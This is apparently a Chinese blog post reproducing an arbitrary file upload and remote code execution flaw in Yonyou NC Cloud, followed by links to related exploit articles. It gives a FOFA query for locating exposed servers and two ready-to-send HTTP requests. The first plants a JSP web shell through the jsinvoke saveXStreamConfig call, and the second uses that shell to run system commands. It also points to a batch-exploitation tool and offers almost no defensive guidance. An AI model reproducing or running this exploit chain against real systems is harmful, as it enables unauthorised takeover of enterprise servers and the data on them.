漏洞复现--用友NC-Cloud全版本任意文件上传/RCE

最新推荐文章于 2024-06-24 14:02:07 发布
最新推荐文章于 2024-06-24 14:02:07 发布
阅读量2.2k 收藏 2
点赞数
分类专栏: 漏洞复现 文章标签: 网络安全 web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53003652/article/details/133922699
版权

免责声明:

文章中涉及的漏洞均已修复,敏感信息均已做打码处理,文章仅做经验分享用途,切勿当真,未授权的攻击属于非法行为!文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任,一旦造成后果请自行负责

一:漏洞描述

NC Cloud是指用友公司推出的大型企业数字化平台。支持公有云、混合云、专属云的灵活部署模式。该产品最近爆出了全版本的一个文件上传/RCE,攻击者可利用此漏洞直接获得服务器权限。

二:漏洞影响版本

全版本

三:网络空间测绘查询

fofa:
app="用友-NC-Cloud"
image.png

四:漏洞复现

image.png

1.首页抓包,使用以下POC:

POST /uapjs/jsinvoke/?action=invoke HTTP/1.1
Host: IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.622.93 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 250

{"serviceName":"nc.itf.iufo.IBaseSPService","methodName":"saveXStreamConfig","parameterTypes":["java.lang.Object","java.lang.String"],"parameters":["${param.getClass().forName(param.error).newInstance().eval(param.cmd)}","webapps/nc_web/c0nf1g.jsp"]}

这里不知道为什么404,但c0nf1g.jsp上传成功了,后续操作正常
image.png
2.POST访问c0nf1g.jsp构造RCE

POST /c0nf1g.jsp?error=bsh.Interpreter HTTP/1.1
Host: IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.2821.52 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 96

cmd=org.apache.commons.io.IOUtils.toString(Runtime.getRuntime().exec("whoami").getInputStream())

image.png

五:批量检测

image.png
项目地址:
https://github.com/MzzdToT/Yongyou_NC_Cloud_upload_rce

六:修复建议

联系厂家发布更新补丁

芝士土包鼠
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
【1day】复现用友 NC NCFindWeb大型企业数字化平台及用友系统uapjs(jsinvoke)任意文件上传漏洞
记录并分享学习安全的知识点..
07-25 1018
用友NC是一款企业级ERP软件。作为一种信息化管理工具,用友NC提供了一系列业务管理模块,包括财务会计、采购管理、销售管理、物料管理、生产计划和人力资源管理等,帮助企业实现数字化转型和高效管理。用友NCNC Cloud系统存在任意文件上传漏洞,攻击者可通过uapjs(jsinvoke)应用构造恶意请求非法上传后门程序,此漏洞可以给NC服务器预埋后门,从而可以随意操作服务器。
用友NC uapjs RCE漏洞复现(CNVD-C-2023-76801)
热门推荐
0xSec
06-29 1万+
用友NCNC Cloud系统存在任意文件上传漏洞,攻击者可通过uapjs(jsinvoke)应用构造恶意请求非法上传后门程序,此漏洞可以给NC服务器预埋后门,从而可以随意操作服务器
【HW必备】用友NC-Cloud存在17处漏洞合集
最新发布
小司机的奥拓
06-24 850
高质量漏洞利用工具分享社区,每天至少更新一个0Day/Nday/1day及对应漏洞的批量利用工具,团队内部POC分享,星球不定时更新内外网攻防渗透技巧以及最新学习研究成果等。如果师傅还是新手,内部的交流群有很多行业老师傅可以为你解答学习上的疑惑,内部分享的POC可以助你在Edu和补天等平台获得一定的排名。如果师傅已经是老手了,有一个高质量的LD库也能为你的工作提高极大的效率,实战或者攻防中有需要的Day我们也可以通过自己的途径帮你去寻找。Cmd5解密,各种漏洞利用工具及后续更新,渗透工具、文档资源分享。
用友 NC Cloud jsinvoke 任意文件上传
败在我手中之敌,从来不会被我视为对手,我给你时间追赶,直至你遥望不见。
12-01 1005
用友 NC Cloud 中存在 jsinvoke 接口的任意文件上传漏洞,攻击者可以通过利用此漏洞系统上传任意恶意文件。
用友版本任意文件上传漏洞复现
败在我手中之敌,从来不会被我视为对手,我给你时间追赶,直至你遥望不见。
07-26 2074
可以使用安全的文件验证机制,例如校验文件的魔术字节、文件头信息、文件结尾等,以确保上传的文件是预期的有效文件,并阻止上传恶意文件。限制文件上传:通过限制用户上传文件的类型、大小和目标路径,可以有效减少任意文件上传漏洞的风险。安全教育和培训:对系统管理员和用户进行安全教育和培训,提高其安全意识,让他们了解常见的安全威胁和最佳实践,以便正确地使用系统和应对潜在威胁。安全审计和监控:实施安全审计和监控机制,定期检查系统日志、访问日志和上传文件日志,及时发现异常活动和潜在的攻击行为。利用此漏洞需要俩段poc。
用友NC 漏洞汇总(转载)
xiaobai_20190815的博客
11-21 9119
用友NC 漏洞汇总
向日葵RCE漏洞(CNVD-2022-10270)检测工具
02-19
向日葵RCE漏洞(CNVD-2022-10270)检测工具,已经编译好,命令行运行即可 xrkrce.exe -h 127.0.0.1
用友NC NCCLOUD BIP ldap公共入口uapjs漏洞补丁
QB2767846279
03-27 1731
ncc1909ldap公共入口漏洞补丁。ncc1909ldap公共入口漏洞补丁。ncc2005ldap公共入口漏洞补丁。ncc2005ldap公共入口漏洞补丁。nc633_ldap公共入口漏洞补丁。nc633_ldap公共入口漏洞补丁。nc65_ldap公共入口漏洞补丁。nc65_ldap公共入口漏洞补丁。nc63_ldap公共入口漏洞补丁。nc63_ldap公共入口漏洞补丁。nc57_ldap公共入口漏洞补丁。nc57_ldap公共入口漏洞补丁。
用友NC-Cloud uploadChunk 任意文件上传漏洞
CommputerMac的博客
10-17 1025
用友 NC Cloud,大型企业数字化平台, 聚焦数字化管理、数字化经营、数字化商业,帮助大型企业实现 人、财、物、客的面数字化,从而驱动业务创新与管理变革,与企业管理者一起重新定义未来的高度。为客户提供面向大型企业集团、制造业、消费品、建筑、房地产、金融保险等14个行业大类,68个细分行业,涵盖数字营销、智能制造、财务共享、数字采购等18大解决方案,帮助企业面落地数字化。uploadChunk文件存在任意文件上传漏洞,攻击者通过此漏洞可实现上传木马文件,控制服务器。
用友NC Cloud存在前台远程命令执行漏洞
holyxp的博客
07-22 614
用友网络是球领先的企业与公共组织软件、云服务、金融服务提供商。提供营销、制造、财务、人力等产品与服务,帮助客户实现发展目标,进而推动商业和社会进步。
用友NCNC Cloud MxServlet反序列化漏洞复现
0xSec
11-15 2256
用友NCNC Cloud系统存在反序列化漏洞系统未将用户传入的序列化数据进行过滤就直接执行了反序列化操作,结合系统本身存在的反序列化利用链,可造成了命令执行,深入利用可随意操作服务器。
复现用友NC-Cloud文件上传漏洞_70
fushuang333的博客
04-10 757
复现用友NC-Cloud文件上传漏洞,上传文件漏洞的影响可能会非常严重,上传可执行代码可能让攻击者获得服务器控制权。
CNVD-C-2023-76801:用友NC uapjs RCE漏洞复现[附POC]
薛定谔嘚喵博客
11-08 1110
用友NCNC Cloud系统存在任意文件上传漏洞,攻击者可通过uapjs (jsinvoke)应用构造恶意请求非法上传后门程序此漏洞可以给NC服务器预埋后门,从而可以随意操作服务器。
用友-NC-Cloud远程代码执行漏洞[2023-HW]
holyxp的博客
08-13 1895
漏洞是通过请求特定的接口,然后调用"nc.itf.iufo.IBaseSPService"服务中的"saveXStreamConfig"方法进行请求;直接往webapps/nc_web/目录写马。最后访问刚才写的马,调用 Runtime.getRuntime().exec(“command”) 来执行系统命令,并通过getInputStream()获取该命令的输出流;然后IOUtils.toString() 方法将输出流转换为字符串。
用友u8 cloud 反序列化rce漏洞复现
12-05
用友U8 Cloud是一款企业级管理软件,但是近期被发现存在反序列化远程命令执行(RCE漏洞。要复现这个漏洞,首先需要一个能够触发反序列化的点,比如一个可控制的对象。接下来,我们可以构造一个恶意的序列化数据,然后将这个数据传递给U8 Cloud系统,让系统进行反序列化操作。当系统对这个数据进行反序列化时,就会触发我们植入的恶意代码,从而实现远程命令执行。 为了更具体地说明这个过程,我们可以借助一个简单的例子来解释。假设我们构造了一个包含恶意命令的序列化数据,并将其发给U8 Cloud系统系统在接收到这个数据后,会将其解析,然后执行其中的命令。这样一来,我们就成功地利用了反序列化漏洞来实现远程命令执行。 当然,为了成功复现这个漏洞,还需要一些具体的技术细节和环境配置。需要了解U8 Cloud系统的结构和漏洞的具体利用方式,还可能需要使用特定的工具来构造恶意的序列化数据。在复现过程中,一定要格外小心,确保不会对受影响的系统造成损害。同时,及时向厂商反馈该漏洞,以便及时修复和加强系统安全防护。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

芝士土包鼠

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值